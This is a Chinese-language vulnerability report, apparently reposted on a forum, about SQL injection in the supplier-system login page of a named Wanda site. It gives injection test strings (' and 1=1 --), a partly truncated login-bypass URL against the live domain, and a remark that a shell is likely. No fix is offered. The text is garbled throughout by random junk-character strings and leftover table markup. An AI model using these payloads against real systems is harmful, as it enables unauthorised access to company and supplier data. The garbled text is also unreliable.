万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
$ b/ [9 H5 W8 K( u+ f2 c详细说明：
, [9 m/ T2 A! q万达scm系统登陆框sql注入。
( B* G; U% j6 b  h) W
! V( E5 ~1 y/ p) I5 hhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
1 C+ ^- c' T! F

500错误。

4 O4 ]3 k* L! ]5 l) y) ^! P! L' O用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
& k  a9 `9 [/ }- f- @截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
经过分析，登陆验证的过程应该是：
" b- q* U' h: v" P' o) M
, u% i8 C+ _" ^7 N取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
. u. F# y; B% H0 ^9 H
& s$ i% s) L+ Ioracle数据库，存在注入点。@大连万达，你怎么看？
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
( R) {4 C9 x9 T; B/ `2 U2 `
系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
, G9 _  B/ w* ^1 J$ H5 z漏洞证明：
! B5 I3 w. E! i万达scm系统登陆框sql注入。
; ?0 X( E# v# C! K% a: Y
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27

1 Y% A: [; A1 T0 w2 F2 D/ w
500错误。

用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
9 [) v$ _8 k( G' K7 mhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png


0 d% R2 v+ ^( ?1 X% c. c. T" S（截图有一点问题）
6 X& k; k7 r/ k
& w; x* g# H: X) Q怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

4 M* ?7 Z+ s# v! w& u取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
& W! Z* M' y( n
绕过：
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1

* l! ~* K: |3 n) `' K8 `
5 u, [5 m! k. {  Voracle数据库，存在注入点。@大连万达，你怎么看？
1 y6 r8 n& s. e; w- L1 J, Y2 @8 j​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

修复方案：
。。。

; _# F. i! G; V7 U; W( X4 ^
7 c0 T" d7 F3 f# q厂商已经确认
( q4 D* ^, X0 [8 {5 {2 G
5 q$ v' z! ?, n. `8 y$ L9 ~' }9 q[/td][/tr]
8 b6 g3 F9 u' `. {, S[/table]


. K+ m! M3 j: {  I( P+ i